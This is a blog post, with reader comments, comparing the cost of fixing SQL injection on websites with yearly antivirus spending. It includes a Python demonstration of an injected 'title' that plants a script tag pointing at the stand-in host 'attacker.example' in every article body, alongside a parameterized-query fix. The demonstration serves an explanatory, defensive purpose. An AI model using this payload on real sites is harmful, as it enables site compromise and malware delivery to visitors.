The Cost of Fixing Vulnerabilities vs. Antivirus Software

Corporations and consumers will collectively spend $8 billion this year on desktop security software, better known as antivirus software. This is a lot of money, and more is spent each and every year while the problem of computer viruses only worsens. I often wonder how this money could be more effectively spent, such as on activities that would significantly reduce the means by which viruses propagate.

Computer viruses predominantly spread in two ways, Web and Email:

  1. A Web browser visits a website that automatically serves up a software exploit, or the website asks the visitor to voluntarily download and install a virus-laced application.
  2. An email is received that automatically launches a software exploit, or the email recipient is asked to voluntarily download and install a virus-laced attachment.

It is the first case that I’d like to focus on. The vast majority of websites that serve up viruses are ‘legitimate’ websites; they’ve just been hacked. An attacker exploits a SQL Injection vulnerability in a target website and uses it to inject malicious content into the site’s database (typically a script or iframe tag pointing to a server that hosts the virus), so that every Web browser visiting the site loads it and is compromised. It would stand to reason that if these SQL Injection vulnerabilities didn’t exist to begin with, viruses could not propagate this way.
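To make the mechanism concrete, here is an added example (not code from the original post) of the pattern described above: a database-backed site renames an article using a string-concatenated UPDATE, and a single crafted “title” appends a script tag to every article body on the site, so every visitor’s browser fetches the attacker’s script. The same handler with bound parameters stores the payload as an odd-looking title on one row and nothing else. The table, column and function names and the host `attacker.example` are hypothetical, and the sample rows are constructed for the demonstration.

```python
import sqlite3

# Hypothetical malware host (example.* domains are reserved for documentation).
PAYLOAD_HOST = "attacker.example"
SCRIPT_TAG = '<script src="http://' + PAYLOAD_HOST + '/m.js"></script>'


def make_db():
    """Constructed sample data: a site whose article bodies are rendered to every visitor."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello readers."), ("Pricing", "See our plans."), ("Contact", "Mail us.")],
    )
    conn.commit()
    return conn


def rename_article_vulnerable(conn, article_id, new_title):
    """Vulnerable: the id is cast to int, but the title is pasted straight into the SQL text."""
    sql = "UPDATE articles SET title = '" + new_title + "' WHERE id = " + str(int(article_id))
    conn.execute(sql)
    conn.commit()


def rename_article_fixed(conn, article_id, new_title):
    """Fixed: bound parameters keep the title as data; it can never become SQL."""
    conn.execute("UPDATE articles SET title = ? WHERE id = ?", (new_title, int(article_id)))
    conn.commit()


# The attacker's "title": it closes the string literal, adds a second SET clause that
# appends the script tag to every body, replaces the original WHERE with 1=1, and
# comments out the remainder of the statement. No stacked queries are needed.
INJECTED_TITLE = "x', body = body || '" + SCRIPT_TAG + "' WHERE 1=1 --"


def infected_count(conn):
    """Number of articles whose rendered body would load the attacker's script."""
    row = conn.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE ?", ("%" + SCRIPT_TAG + "%",)
    ).fetchone()
    return row[0]


def titles(conn):
    return [r[0] for r in conn.execute("SELECT title FROM articles ORDER BY id")]


def demo():
    """Run the same request against the vulnerable and the fixed handler."""
    results = {}

    # Before the fix: one request poisons every page on the site.
    conn = make_db()
    rename_article_vulnerable(conn, 1, INJECTED_TITLE)
    results["vulnerable_infected"] = infected_count(conn)  # 3

    # After the fix: the payload lands as a literal title on row 1 and nothing else changes.
    conn = make_db()
    rename_article_fixed(conn, 1, INJECTED_TITLE)
    results["fixed_infected"] = infected_count(conn)  # 0
    results["fixed_title_row1"] = titles(conn)[0] == INJECTED_TITLE  # True
    return results


if __name__ == "__main__":
    print(demo())
```

The fix is the one-line change from string concatenation to a parameterized query; that is also why, once it is applied properly, the cost is not paid again next year.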

Let’s say we take the top five hundred thousand of the most trafficked and “important” websites. Statistics at WhiteHat Security say that about 11% of websites, or 55,000 in our target set, have at least 1 SQL Injection vulnerability. We should also assume that where a website has 1 SQL Injection vulnerability, it really has 10. This gives us a total of 550,000 SQL Injection vulnerabilities in circulation. Finally, let’s estimate that each SQL Injection vulnerability will require 40 developer hours x $100 per hour to fix, or about $4,000 in labor costs.

When all the math is combined (550,000 x $4,000) we get a total of $2.2 billion to fix the SQL Injection issues that are responsible for a significant chunk of our computer virus woes, or about 1/4 of what is spent on antivirus software. Contrast this with the fact that corporations spend less than $500 million each year on application security, even when you combine vulnerability scanning, Web application firewalls, source code reviews, developer training, etc.

There is another benefit to fixing the vulnerability over purchasing antivirus software. When a vulnerability like SQL Injection is fixed (properly), you don’t have to spend that money next year to fix it again. With antivirus software, you must pay the cost each and every year for the foreseeable future, with little to no benefit carried forward.

I also often wonder what it will take to shift information security spending habits from tradition to efficacy.

  • Richard

I do agree that it’s important to fix the issue at the root source. But in a security-in-depth model, you need to have antivirus software too, in the case of email when an attachment or link is included in HTML or another piece of malicious code.

  • Maciej Łebkowski

    Seriously? 40 man-hours to fix SQL injection?

    • Chris W

I’m actually doing a cost-benefit for my company on this. 40 hrs does seem high; any ideas on a more reasonable number?

  • kingthorin

I’m going to go ahead and point out for any nay-sayers that even if you double it to also account for XSS, or triple it to account for XSS and some other type of attack (CSRF, click-jacking, whatever), you’re still well under the $8 billion for AV.

  • Bennet_Marky

    Hi Jeremiah,

I truly agree with you. It is important that we fix the email and web browser problem. Unless these two are properly corrected, there is no use in installing anti-virus software. Each year you will end up installing new software, and every month a new kind of virus will crop up. So you will really have the trouble of keeping your system updated. Now that is the most common problem that every computer user suffers from.

  • Trinidad

    Excellent post. Keep writing such kind of information on your page.

I’m really impressed by your blog.

Hi there, you have done a great job. I’ll certainly digg it and for my part suggest it to my friends. I am sure they will benefit from this site.